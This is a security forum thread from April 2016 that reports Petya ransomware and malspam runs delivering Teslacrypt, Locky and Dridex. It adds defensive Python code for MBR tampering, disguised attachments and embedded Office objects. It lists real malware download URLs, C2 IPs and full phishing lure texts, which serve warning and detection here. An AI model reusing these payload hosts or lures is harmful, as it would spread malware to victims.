- a -photo- of a young man, purporting to be an applicant (in fact it is a publicly-available-stock image)
- an -executable- pretending to be a CV in a self-extracting archive or in PDF (in fact it is a malicious dropper in the form of a 32bit PE file):
> https://blog.malware...petya_exe-1.png
In order to execute its -harmful- features, it needs to run with Administrator privileges. However, it doesn’t even try to deploy any user account control (UAC) bypass technique. It relies fully on social engineering. When we try to run it, UAC pops up this alert:
> https://blog.malware...3/uac_popup.png
After deploying the application, the system crashes. When it restarts, we see the following screen, which is an -imitation- of a CHKDSK scan:
> https://blog.malware...s/2016/03/1.png
In -reality- the malicious kernel is already encrypting. When it finishes, the affected user encounters this blinking screen with an ASCII art:
> https://blog.malware...s/2016/03/2.png
Pressing a key leads to the main screen with the ransom note and all information necessary to reach the Web panel and proceed with the payment:
> https://blog.malware...s/2016/03/3.png
... We noted that the website for the victim is well prepared and very informative. The menu offers several language versions, but so far only English works:
> https://blog.malware...ain-768x707.png
It also provides a step-by-step process on how affected users can recover their data:
> https://blog.malware...ide-768x707.png
... We expect that cybercriminals release as little information about themselves as possible. But in this case, the authors and/or distributors are very open, sharing the team name—”Janus Cybercrime Solutions”—and the project release date—12th December 2015...
Conclusion: In terms of architecture, Petya is very advanced and atypical. Good-quality FUD, a well-obfuscated dropper – and the heart of the ransomware – a little kernel – show that the authors are highly skilled. However, the chosen low-level architecture enforced some limitations, i.e. small code size and inability to use API calls. This makes cryptography difficult. That’s why the key was generated by the higher layer – the Windows executable. This solution works well, but introduces a weakness that allowed the key to be restored (if we manage to -catch- Petya at -Stage1- -before- the key is erased)..."
(More detail at the malwarebytes URL at the top of this post.)
___

Ransomware and Recent Variants
- https://www.us-cert....lerts/TA16-091A
March 31, 2016
___

- https://www.virusbul...n-threat-model/
"... Preventing macro malware from infecting your machine is really simple: -don't- enable macros, no matter how much a document urges you to do so..."
 

:ph34r: :ph34r:   <_<


Edited by AplusWebMaster, 01 April 2016 - 12:52 PM.

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.
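The Malwarebytes analysis quoted above makes the point that Petya does not encrypt files; it replaces the bootstrap code in the master boot record and leaves the partition table in place, so the machine only appears to run CHKDSK on the next reboot. A defender who has recorded a baseline of the MBR on a known-clean machine can detect that replacement while the system is still in Stage 1, before the reboot. The check below is an added example written for this thread; it is not Malwarebytes' code or Petya's, and it works on a 512-byte sector passed in as bytes, so the sample MBRs are constructed in the block itself. The `read_first_sector` helper is how the same check would be fed a real sector from a disk image (or, with administrator rights, a raw device such as `\\.\PhysicalDrive0` on Windows).

```python
import hashlib
import struct

SECTOR_SIZE = 512
BOOTSTRAP_LEN = 440     # classic MBR layout: bytes 0..439 are executable boot code
DISK_SIG_OFFSET = 440   # 4-byte disk signature, then 2 reserved bytes
PT_OFFSET = 446         # partition table: four 16-byte entries
BOOT_SIG_OFFSET = 510   # must end in 0x55 0xAA


def read_first_sector(path):
    """Read sector 0 from a disk image file or a raw device node (admin/root needed for devices)."""
    with open(path, "rb") as fh:
        return fh.read(SECTOR_SIZE)


def parse_mbr(sector):
    """Split one MBR sector into its bootstrap hash, disk signature and non-empty partition entries."""
    if len(sector) != SECTOR_SIZE:
        raise ValueError("MBR must be exactly one 512-byte sector")
    partitions = []
    for i in range(4):
        entry = sector[PT_OFFSET + 16 * i: PT_OFFSET + 16 * (i + 1)]
        # status(1) CHS-start(3) type(1) CHS-end(3) LBA-start(4) sector-count(4)
        status, ptype, lba_start, num_sectors = struct.unpack("<B3xB3xII", entry)
        if ptype != 0:
            partitions.append({"index": i, "bootable": status == 0x80, "type": ptype,
                               "lba_start": lba_start, "sectors": num_sectors})
    return {
        "boot_signature_ok": sector[BOOT_SIG_OFFSET:] == b"\x55\xAA",
        "disk_signature": struct.unpack("<I", sector[DISK_SIG_OFFSET:DISK_SIG_OFFSET + 4])[0],
        "bootstrap_sha256": hashlib.sha256(sector[:BOOTSTRAP_LEN]).hexdigest(),
        "partitions": partitions,
    }


def check_mbr(sector, baseline_bootstrap_sha256):
    """Return a list of findings; an empty list means the sector matches the recorded baseline."""
    info = parse_mbr(sector)
    findings = []
    if not info["boot_signature_ok"]:
        findings.append("missing 0x55AA boot signature")
    if info["bootstrap_sha256"] != baseline_bootstrap_sha256:
        # This is the Petya case: partition table untouched, bootstrap code swapped out.
        findings.append("bootstrap code differs from recorded baseline")
    if not info["partitions"]:
        findings.append("partition table is empty")
    elif not any(p["bootable"] for p in info["partitions"]):
        findings.append("no partition flagged bootable")
    return findings


def build_sample_mbr(bootstrap):
    """Constructed test sector: given bootstrap bytes, one bootable NTFS-type partition at LBA 2048."""
    boot = bootstrap.ljust(BOOTSTRAP_LEN, b"\x00")[:BOOTSTRAP_LEN]
    disk_sig = struct.pack("<I", 0x1234ABCD) + b"\x00\x00"
    entry = struct.pack("<B3sB3sII", 0x80, b"\x20\x21\x00", 0x07, b"\xFE\xFF\xFF", 2048, 1_000_000)
    table = entry + b"\x00" * 48
    return boot + disk_sig + table + b"\x55\xAA"


# Constructed samples: a "clean" sector whose bootstrap hash is the baseline, and one whose
# bootstrap was replaced while the partition table was left intact.
GOOD_MBR = build_sample_mbr(b"\xEB\x63\x90" + b"CONSTRUCTED-CLEAN-BOOTCODE")
BASELINE = hashlib.sha256(GOOD_MBR[:BOOTSTRAP_LEN]).hexdigest()
TAMPERED_MBR = build_sample_mbr(b"\xEB\x63\x90" + b"CONSTRUCTED-REPLACED-BOOTCODE")
NO_SIG_MBR = GOOD_MBR[:BOOT_SIG_OFFSET] + b"\x00\x00"

if __name__ == "__main__":
    for label, sector in (("clean", GOOD_MBR), ("tampered", TAMPERED_MBR), ("no-signature", NO_SIG_MBR)):
        print(label, check_mbr(sector, BASELINE) or "OK")
```

Record the baseline hash once, offline, and keep it outside the machine it describes; a legitimate bootloader reinstall changes it, so re-record it after such maintenance rather than ignoring the alert.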


#1690 AplusWebMaster

Posted 04 April 2016 - 06:30 AM

FYI...

Fake 'VeriFone' SPAM - JS malware
- https://myonlinesecu...ice-js-malware/
4 Apr 2016 - "An email with the subject of 'VeriFone Services UK and Ireland Ltd' pretending to come from donotreply_invoices@ verifone .com  with a zip attachment is another one from the current bot runs which downloads some sort of malware... The email looks like:
From: donotreply_invoices@ verifone .com
Date: Mon 04/04/2016 10:29
Subject: VeriFone Services UK and Ireland Ltd
Attachment: VeriFone_20160404095713.zip
    Please see attached Invoice(s).
    Thanks and Regards,
    VeriFone Services UK and Ireland Ltd
    Confidentiality Note: This email message contains information that is confidential. If you are not the intended recipient, you are hereby notified that any use, dissemination, distribution or copying of this message is prohibited. If you have received this message or attachment in error, please notify us immediately by email and delete the original...


4 April 2016: VeriFone_20160404095713.zip: Extracts to: VeriFone_20160404092434.js
Current Virustotal detections 3/57*. MALWR** shows a download from
 http ://tag2change .com/images/old/note.exe (VirusTotal 4/57***)... This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1459766150/

** https://malwr.com/an...Dc3MTA5NTMyYjI/
Hosts
108.175.14.122: https://www.virustot...22/information/
>> https://www.virustot...9e550/analysis/

*** https://www.virustot...sis/1459766714/
___

Fake 'Refund' SPAM - JS malware leads to Teslacrypt ransomware
- https://myonlinesecu...ypt-ransomware/
4 Apr 2016 - "An email with the subject of 'Refund for #18613 – $2,179,44' [random number, random amount] pretending to come from random names, companies and email addresses with a zip attachment is another one from the current bot runs which downloads Teslacrypt ransomware... One of the emails looks like:
From: Pongky Morrill <MorrillPongky34@ bitsport .ru>
Date: Mon 04/04/2016 12:20
Subject: Refund for #18613 – $2,179,44
Attachment: copy_nz_930864.zip
    Your refund request has been processed.
    Please, find the confirmation attached to this e-mail.


4 April 2016: copy_nz_930864.zip: Extracts to: letter_EWxago.js - Current Virus total detections 6/57*
.. MALWR** shows a download of a -new- version of Teslacrypt ransomware from
 http ://greetingseuropasqq .com/80.exe?1 (VirusTotal 7/57***)... This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1459768523/

** https://malwr.com/an...GQ4ZTZmZjU1YTU/
Hosts
54.212.162.6
217.70.180.150
107.180.43.132
107.180.4.122
76.162.168.113
192.186.220.8
71.18.247.59


*** https://www.virustot...sis/1459772578/
TCP connections
217.70.180.150
107.180.43.132

___

Fake 'photos' SPAM - from your own email address delivering Locky ransomware
- https://myonlinesecu...but-empty-zips/
4 Apr 2016 - "An email with the subject of 'Photos' [random number between 1 and 4] pretending to come from your own email address with a zip attachment is -supposed- to be another one from the current bot runs which downloads Dridex, Locky or some other malware but is malformed-and-misconfigured so the attached zip is -empty- ... They use email addresses and subjects that will entice a user to read the email and open the attachment...
Update: Some working copies now trickling through containing -nemucod- downloaders delivering Locky ransomware. The email looks like:
From: Your email address
Date: Mon 04/04/2016 10:48
Subject: Photos 3
Attachment: 20160404_074897_resized.zip
    Envoyé de mon Galaxy S6 edge+ Orange


Update: Managed to get a 'working' copy...
4 April 2016: 20160404_409472_resized.zip: Extracts to: 20160401_833019_resized.js
Current Virus total detections 2/57*.. downloads what looks like Locky ransomware from
 http ://taytantalya .com/54eftygub (VirusTotal 2/56**)
Some other locations seen include:
 hatgiongrangdong .com/54eftygub and
 amid-s .com.ua/54eftygub
 http ://2ws .club/54eftygub
 http ://asensor .com.sg/54eftygub
 http ://freya58 .ru/54eftygub
 http ://lindecoration .com/54eftygub
 http ://lxtrading .com.sg/54eftygub
 http ://sargentojoe .com.br/54eftygub
 http ://stylekoko .com/54eftygub
 http ://waxmod .com/54eftygub ...
This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1459764701/

** https://www.virustot...sis/1459763558/
TCP connections
91.209.77.86: https://www.virustot...86/information/
>> https://www.virustot...7d291/analysis/
___

Fake 'Your Booking' SPAM - JS malware leads to Teslacrypt
- https://myonlinesecu...ypt-ransomware/
4 Apr 2016 - "An email with the subject of 'Changes in Your Booking (Booking Nr:46081)' [random numbered] pretending to come from random names and email addresses with a zip attachment is another one from the current bot runs which downloads Teslacrypt... The email looks like:
From: Trudey Daniel <DanielTrudey588@ eskweb .net>
Date: Mon 04/04/2016 14:40
Subject: Changes in Your Booking (Booking Nr:46081)
Attachment: aqq_copy_830379.zip
    There has been some important change in your booking (Booking Nr:46081). Please review the confirmation below.


4 April 2016: aqq_copy_830379.zip: Extracts to: doc_xXsKNB.js - Current Virus total detections 5/57*
.. Downloads Teslacrypt from the same locations as this earlier post**... This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1459777068/

** https://myonlinesecu...ypt-ransomware/
___

Fake 'Your parcel' SPAM - JS malware
- https://myonlinesecu...yan-js-malware/
4 Apr 2016 - "An email with the subject of 'Your parcel #898322, Status: Arrived Otis Ryan' [random numbered] pretending to come from Otis Ryan <cobranza@ moldecor .com> with a zip attachment is another one from the current bot runs which downloads some sort of malware... The email looks like:
From: Otis Ryan <cobranza@ moldecor .com>
Date:
Subject: Your parcel #898322, Status: Arrived Otis Ryan
Attachment: Otis Ryan.zip
    Valued Customer, Otis Ryan
    The check of 255.00$ for the parcel #617473 was received by our company and now has the Status: Paid.
    Our people has already shipped the purchase.
    Please, Be sure to write us back if you already received the order, as it should have been delivered on February 3, 2016.
    If you have any questions, you can check the details order enclosed to this e-mail, or call our department and we will offer you the other options.


4 April 2016: Otis Ryan.zip: Extracts to: Otis Ryan.js - Current Virus total detections 3/57*
.. MALWR** doesn’t show any downloads but Payload security[1] shows a download of some malware from
 yuilouters .com/img/sc.php?m=c2FuZHJhQG9uZWtuaWdodC5jby51aw%3D%3D&f=img.jpg (VirusTotal 4/56***). MALWR[2] - This isn’t a JPG (image file) but a -renamed- .exe file -despite- the icon showing it to be a jpg... This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1459789450/

** https://malwr.com/an...2ZmYzhkZDZiNTc/

1] https://www.reverse....environmentId=4
Host Address
130.255.129.102: https://www.virustot...02/information/

*** https://www.virustot...sis/1459790694/

2] https://malwr.com/an...DcwYjdlNGFjZGQ/

yuilouters .com: 193.33.197.174
176.105.171.196
46.98.193.150
176.124.235.127
176.103.235.5
178.217.162.239
5.1.14.100
79.113.106.239
86.126.0.128
176.36.70.114

 

Edited by AplusWebMaster, 04 April 2016 - 01:04 PM.
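Every report in this post ends on the same warning: with "show known file extensions" off, `Otis Ryan.js` shows as "Otis Ryan", `IMG0000024405.js` looks like a photo, and the `sc.php?...&f=img.jpg` download is a renamed .exe wearing a JPG icon. The triage function below is an added example for this thread, not code from myonlinesecurity or the analysts quoted; it applies the extension and content checks a mail gateway or a help-desk script would run on an attachment name plus its first few bytes. The attachment names are the ones quoted in the posts above; the byte strings handed to it are constructed, and the `EXPECTED_MAGIC` mapping is a deliberately small table, not a complete type database.

```python
import os

# Extensions Windows runs directly; with extensions hidden, this final part is what the user never sees.
EXECUTABLE_EXTS = {"exe", "scr", "com", "pif", "bat", "cmd", "hta", "js", "jse",
                   "vbs", "vbe", "wsf", "wsh", "ps1", "jar", "msi"}
# Office formats that can carry VBA macros or a clickable embedded object.
MACRO_CAPABLE_EXTS = {"doc", "dot", "docm", "dotm", "xls", "xlt", "xlsm", "pptm", "rtf"}
ARCHIVE_EXTS = {"zip", "rar", "7z", "cab", "ace"}
# Extensions that make a name look like a harmless document or media file.
BENIGN_LOOKING_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "jpg", "jpeg", "png",
                       "gif", "wav", "mp3", "txt", "htm", "html"}
# Leading bytes of common types: a content check that neither the name nor the icon can fake.
MAGIC = [(b"MZ", "exe"), (b"%PDF", "pdf"), (b"\xff\xd8\xff", "jpg"), (b"\x89PNG", "png"),
         (b"RIFF", "wav"), (b"PK\x03\x04", "zip"), (b"Rar!", "rar"), (b"\xd0\xcf\x11\xe0", "ole")]
EXPECTED_MAGIC = {"pdf": "pdf", "jpg": "jpg", "jpeg": "jpg", "png": "png", "wav": "wav",
                  "zip": "zip", "docx": "zip", "xlsx": "zip", "rar": "rar", "doc": "ole", "xls": "ole"}


def split_name(name):
    """Return (base, [extensions]) for an attachment name, lower-cased, path stripped."""
    base = os.path.basename(name.replace("\\", "/")).lower()
    parts = base.split(".")
    return parts[0], [p for p in parts[1:] if p]


def sniff_type(head):
    """Identify a file by its first bytes; None when no known magic matches."""
    for magic, kind in MAGIC:
        if head.startswith(magic):
            return kind
    return None


def assess_attachment(name, head=b""):
    """Return a list of findings for one attachment; an empty list means nothing stood out."""
    _, exts = split_name(name)
    final = exts[-1] if exts else ""
    findings = []
    if not exts:
        findings.append("no extension: decide by content, not by icon")
    if final in EXECUTABLE_EXTS:
        findings.append(f"executable or script extension .{final}")
        if len(exts) >= 2 and exts[-2] in BENIGN_LOOKING_EXTS:
            findings.append(f"double extension .{exts[-2]}.{final}: shows as .{exts[-2]} when extensions are hidden")
    if final in MACRO_CAPABLE_EXTS:
        findings.append(f".{final} can carry macros or embedded objects: do not enable content")
    if final in ARCHIVE_EXTS:
        findings.append("archive wrapper: run this same check on each extracted member")
    if head:
        sniffed = sniff_type(head)
        if sniffed == "exe" and final not in {"exe", "scr", "com", "pif", "dll"}:
            findings.append(f"content is a Windows PE executable although the name says .{final or '(none)'}")
        elif sniffed and final in EXPECTED_MAGIC and EXPECTED_MAGIC[final] != sniffed:
            findings.append(f"content looks like {sniffed}, not .{final}")
    return findings


def triage(samples):
    """Map each (name, head) pair to its findings, so a batch of attachments can be reviewed at once."""
    return {name: assess_attachment(name, head) for name, head in samples}


if __name__ == "__main__":
    # Names taken from the reports above; the byte heads are constructed for the example.
    samples = [
        ("Photos(80).zip", b"PK\x03\x04"),
        ("IMG0000024405.js", b"var a="),
        ("MSG00004481919.WAV.js", b"var a="),
        ("Otis Ryan.js", b"var a="),
        ("img.jpg", b"MZ\x90\x00\x03\x00"),          # the renamed .exe behind sc.php?...&f=img.jpg
        ("scan0001.xls", b"\xd0\xcf\x11\xe0"),
        ("receipt.pdf", b"%PDF-1.4"),                 # constructed benign control
    ]
    for name, findings in triage(samples).items():
        print(f"{name}: {findings or 'nothing flagged'}")
```

The content sniff is the part worth keeping even if the name checks are tuned down: a PE file starts with `MZ` whatever its extension says, which is exactly what the JPG-iconed executable in the 'Your parcel' report relies on nobody checking.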



#1691 AplusWebMaster

Posted 05 April 2016 - 04:25 AM

FYI...

Fake 'Receipt' SPAM - xls macro malware
- https://myonlinesecu...-macro-malware/
5 Apr 2016 - "An email with the subject of 'Receipt' pretending to come from Mike <mike@ xencourier .co.uk> with a malicious Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
From: Mike  <mike@ xencourier .co.uk>
Date: Tue 05/04/2016 10:10
Subject: Receipt
Attachment: scan0001.xls
    Hi
    Here is your credit card receipt attached. VAT invoice to follw in due course.
    Best regards
    Mike ...


5 April 2016: scan0001.xls -  Current Virus total detections 4/57*
.. REVERSEIT** and MALWR*** show a download from
 http ://unifire .in/43tgw - MALWR[4] VirusTotal 3/56[5]. I am unsure whether this is Dridex or Locky ransomware; judging by the auto analysis, I am guessing Dridex with an anti-analysis component... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1459847342/

** https://www.reverse....environmentId=4
Contacted Hosts
184.154.132.107
195.169.147.78


*** https://malwr.com/an...zU5Y2IyNDVjZDY/
Hosts
184.154.132.107: https://www.virustot...07/information/
>> https://www.virustot...423d3/analysis/

4] https://malwr.com/an...TIxNWYyYmIwZmY/

5] https://www.virustot...sis/1459847771/
___

Fake 'Your Balance' SPAM - leads to Teslacrypt
- https://myonlinesecu...ypt-ransomware/
5 Apr 2016 - "An email with the subject of 'Actual Status on Your Balance 49166' [random numbered] pretending to come from random names and email addresses with a zip attachment is another one from the current bot runs which downloads Teslacrypt ransomware... The email looks like:
From: Random senders
Date: Tue 05/04/2016 13:05
Subject: Actual Status on Your Balance 49166
Attachment: zi_invoices_764173.zip
    Please find attached your actual statement for the period of 02/2016 to 03/2016.


5 April 2016: zi_invoices_764173.zip: Extracts to: check_WuKGkn.js - Current Virus total detections 23/56*
.. downloads Teslacrypt ransomware from
 http ://marvellrulesqq .com/70.exe?1 (VirusTotal 5/56**)... This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1441173827/

** https://www.virustot...sis/1459859633/
TCP connections
23.229.239.227

marvellrulesqq .com: 185.118.142.154: https://www.virustot...54/information/
>> https://www.virustot...93956/analysis/
54.212.162.6: https://www.virustot....6/information/
>> https://www.virustot...bd5de/analysis/
104.161.60.151: https://www.virustot...51/information/
___

Fake 'Bank' SPAM - doc malware
- https://myonlinesecu...rd-doc-malware/
5 Apr 2016 - "This email that appears to be from Union National Bank-Egypt with the subject of 'PFI -05.04.16'  pretending to come from CEO Finexx Group <sales@ salesbabu .com> with a malicious word doc attachment is another one from the current bot runs...

Screenshot: https://myonlinesecu...ou-1024x597.png

5 April 2016: Invvoice.docx - Current Virus total detections 8/56*
.. MALWR** - This -malicious- word doc has an -embedded- .exe file that gets extracted and decoded when you click-on-the-icon inside the word doc to deliver MICROSOFT.exe (VirusTotal 7/55***). This was passed on to me by another analyst... When I extracted the malware from the word doc I got this differently detected malware (VT 7/57[4])... See screenshot (below):
> https://myonlinesecu...cx-1024x532.png
 These embedded OLE objects will extract from ANY office program that can read & display word docs, as far as I am aware this also includes open office, libre office and all the other non-Microsoft programs. If you do follow their advice and click-on-the-object... it is game-over and you-are-compromised... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1459854693/

** https://malwr.com/an...zljMGUxMWFhNzk/

*** https://www.virustot...sis/1459854644/
TCP connections
93.184.220.29
104.86.111.136


4] https://www.virustot...sis/1459861778/
___

Fake 'Invoice - e-pay' SPAM - JS malware leads to Dridex
- https://myonlinesecu...eads-to-dridex/
5 Apr 2015 - "An email with the subject of 'Invoice: 912409' pretending to come from UK e-pay Email Server (epay UK) <DO.NOT.REPLY.TO@ uk.epayworldwide .com> with a zip attachment is another one from the current bot runs which downloads Dridex banking Trojan... The email looks like:
From: UK e-pay Email Server (epay UK) <DO.NOT.REPLY.TO@ uk.epayworldwide .com>
Date: Tue 05/04/2016 12:24
Subject: Invoice: 912409
Attachment: PeriodSummarybyTerminal.zip
    Account: 912409


5 April 2016: PeriodSummarybyTerminal.zip: Extracts to: KFVL-902246613812.js - Current Virus total detections 6/57*
.. Downloads Dridex banking Trojan from
 http ://mekongtrails .com/4543t43 (VirusTotal 5/56**), which appears to be the -same- version and also using the -same- file names and the -same- other download locations as THIS earlier malspam run***... This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1459859137/

** https://www.virustot...sis/1459858301/

*** https://myonlinesecu...-macro-malware/

mekongtrails .com: 173.236.74.11: https://www.virustot...11/information/
>> https://www.virustot...ab5f6/analysis/
___

Fake 'Unpaid Bill' SPAM - JS malware leads to Teslacrypt
- https://myonlinesecu...-to-teslacrypt/
5 Apr 2016 - "An email with the subject of 'Unpaid Bill for Car Repair Service 7650' [random numbered] pretending to come from random names and email addresses with a zip attachment is another one from the current bot runs which downloads teslacrypt... The email looks like:
From: Random
Date: Tue 05/04/2016 16:33
Subject: Unpaid Bill for Car Repair Service 7650
Attachment: copy_xerox.device5_868199.zip
    We kindly ask you to review our unpaid bill again and send us the payment in order to avoid additional costs.


5 April 2016: copy_xerox.device5_868199.zip: Extracts to: finance_NJTugN.js - Current Virus total detections 7/57*
.. MALWR** and payload security*** show a download of Teslacrypt from
 marvellrulesqq .com/70.exe?1 (VirusTotal 4/56[4]) or
 http ://marvellrulesqq .com/80.exe?1 (VirusTotal 4/57[5]). Although both files are the same size they have different sha1# ... This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1459871414/

** https://malwr.com/an...TZiYjFiMGYyNGY/
Hosts
104.161.60.151
23.229.239.227
194.228.3.204


*** https://www.hybrid-a...environmentId=4
Contacted Hosts
54.212.162.6
23.229.239.227
194.228.3.204


4] https://www.virustot...sis/1459872787/
TCP connections
23.229.239.227
194.228.3.204
107.180.26.75
192.185.151.39


5] https://www.virustot...sis/1459873099/
TCP connections
23.229.239.227
194.228.3.204


marvellrulesqq .com: 185.118.142.154: https://www.virustot...54/information/
>> https://www.virustot...e2817/analysis/
54.212.162.6: https://www.virustot....6/information/
>> https://www.virustot...bd5de/analysis/
104.161.60.151: https://www.virustot...51/information/
 

Edited by AplusWebMaster, 05 April 2016 - 02:39 PM.
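The 'Bank' report above is the case the usual macro advice does not cover: Invvoice.docx carries no macro, it carries an embedded OLE object that unpacks MICROSOFT.exe when the icon is clicked, and the post notes this works in any suite that renders Word documents. The inspector below is an added example for this thread, not code from myonlinesecurity or MALWR. It opens an Office Open XML package (docx/docm/xlsx/xlsm are ZIP archives) and reports a `vbaProject.bin` part (macros, the 'Receipt' .xls case once saved as xlsm) and any `embeddings/` part, with a heuristic look for a Windows executable inside the embedded blob. The sample documents are constructed in the block; for the legacy binary .doc/.xls (OLE2) format it only reports the format, because walking a compound file needs an OLE parser, which is what tools such as oletools provide.

```python
import io
import zipfile

OLE2_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"
# DOS stub text present in practically every PE file; survives even when the .exe is wrapped in an OLE stream.
DOS_STUB = b"This program cannot be run in DOS mode"


def inspect_ooxml(data):
    """Report macro parts and embedded objects in an OOXML package held in memory."""
    result = {"format": None, "macros": False, "embedded_objects": [],
              "pe_inside_embedding": [], "findings": []}
    if data.startswith(OLE2_MAGIC[:4]):
        result["format"] = "ole2"
        result["findings"].append("legacy binary Office file: needs an OLE parser for macro/object streams")
        return result
    if not data.startswith(b"PK"):
        result["findings"].append("not an Office Open XML package")
        return result
    result["format"] = "ooxml"
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            lower = name.lower()
            if lower.endswith("vbaproject.bin"):
                result["macros"] = True
                result["findings"].append(f"VBA project present: {name}")
            if "/embeddings/" in lower:
                result["embedded_objects"].append(name)
                blob = zf.read(name)
                if blob.startswith(b"MZ") or DOS_STUB in blob:
                    result["pe_inside_embedding"].append(name)
                    result["findings"].append(f"embedded object {name} contains a Windows executable")
                else:
                    result["findings"].append(f"embedded OLE object present: {name}")
    return result


def build_docx(extra_parts):
    """Constructed minimal .docx: content types, a document part, plus whatever parts the caller adds."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml",
                    '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("word/document.xml", "<w:document/>")
        for part_name, content in extra_parts.items():
            zf.writestr(part_name, content)
    return buf.getvalue()


# Constructed samples: a clean document, one with an embedded executable wrapped in an OLE
# container (the Invvoice.docx pattern), one with a VBA project, and a bare legacy OLE2 header.
CLEAN_DOCX = build_docx({})
EMBEDDED_EXE_DOCX = build_docx({
    "word/embeddings/oleObject1.bin": OLE2_MAGIC + b"\x00" * 24 + b"MZ\x90\x00" + b"\x00" * 60 + DOS_STUB,
})
MACRO_DOCM = build_docx({"word/vbaProject.bin": OLE2_MAGIC + b"\x00" * 56})
LEGACY_OLE_SAMPLE = OLE2_MAGIC + b"\x00" * 504

if __name__ == "__main__":
    for label, doc in (("clean", CLEAN_DOCX), ("embedded-exe", EMBEDDED_EXE_DOCX),
                       ("macro", MACRO_DOCM), ("legacy-ole", LEGACY_OLE_SAMPLE)):
        print(label, inspect_ooxml(doc)["findings"] or "nothing flagged")
```

An embedded object is worth flagging on its own, executable or not: the document still has to persuade the reader to double-click it, and the "enable editing / click the icon" instructions quoted in these reports are that persuasion.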



#1692 AplusWebMaster

Posted 06 April 2016 - 07:09 AM

FYI...

Fake 'Voicemail' SPAM - JS malware
- https://myonlinesecu...437-js-malware/
4 Apr 2016 - "An email with the subject of 'New Voicemail Message From 07792084437' [random numbers] pretending to come from Soho66 <noreply@ soho66 .co.uk> with a zip attachment is another one from the current bot runs which downloads some sort of malware... The email looks like:
From: Soho66 <noreply@ soho66 .co.uk>
Date:
Subject: New Voicemail Message From 07792084437
Attachment: MSG0000060895.WAV.RAR
    Hi,
    You have been left a 0:19 long message (number 11) in mailbox 1006 from 07792060895, on Wed, 06 Apr 2016 06:13:47 -0400
    The voicemail message has been attached to this email as a wave file – which you can play on most computers.
    Our Regards
    The Soho66 Customer Team
    Please do not reply to this message. This is an automated message which comes from an unattended mailbox...


6 April 2016: MSG0000060895.WAV.RAR: Extracts to: MSG00004481919.WAV.js - Current Virus total detections 5/57*
.. MALWR** shows a download from  http ://mapstor .org/1278u0 (VirusTotal 1/57***). MALWR[4]... This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1459938427/

** https://malwr.com/an...zlhMDU4NTBmMDk/
Hosts
104.27.167.24: https://www.virustot...24/information/
>> https://www.virustot...b40e7/analysis/

*** https://www.virustot...sis/1459939012/

4] https://malwr.com/an...mVkOWQ0YWJhZmI/
___

Fake 'Invoicing' SPAM - JS malware
- https://myonlinesecu...ing-js-malware/
6 Apr 2016 - "An email with no subject pretending to come from Liberty Wines, Invoicing <invoicing@ libertywines .co.uk> with a zip attachment is another one from the current bot runs which downloads an unknown malware probably either Locky ransomware or Dridex banking Trojan... The email looks like:
From: , Invoicing <invoicing@ libertywines .co.uk>
Date: Wed 06/04/2016 11:50
Subject: [blank/empty]
Attachment: Sales-Invoice  LWIN0136332.rar
    Dear Customer,
    Please find attached your invoice, number: LWIN0136332.
    Kind regards,
    Liberty Wines


6 April 2016: Sales-Invoice LWIN0136332.rar: Extracts to: MSG00008141521.WAV.js - Current Virus total detections 5/57*
.. MALWR** shows a download from http ://vnnsports .com/1278u0 which although a different # is the -same- malware as described in THIS earlier post***... This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1459939899/

** https://malwr.com/an...DRiNTczNGIxMGY/
Hosts
184.154.132.107: https://www.virustot...07/information/
>> https://www.virustot...59b1b/analysis/

*** https://myonlinesecu...437-js-malware/
___

Fake 'Document(1)' SPAM - doc macro malware
- https://myonlinesecu...-macro-malware/
6 Apr 2016 - "A blank/empty email with the subject of 'Document(1)' pretending to come from your own email address with a malicious word doc attachment is another one from the current bot runs... The email looks like:
From: your email address
Date: Wed 06/04/2016 14:15
Subject: Document(1)
Attachment: Document(1).doc


Body content: Totally empty/Blank

6 April 2016: Document(1).doc - Current Virus total detections 10/56*
.. MALWR shows a download of Dridex banking Trojan from
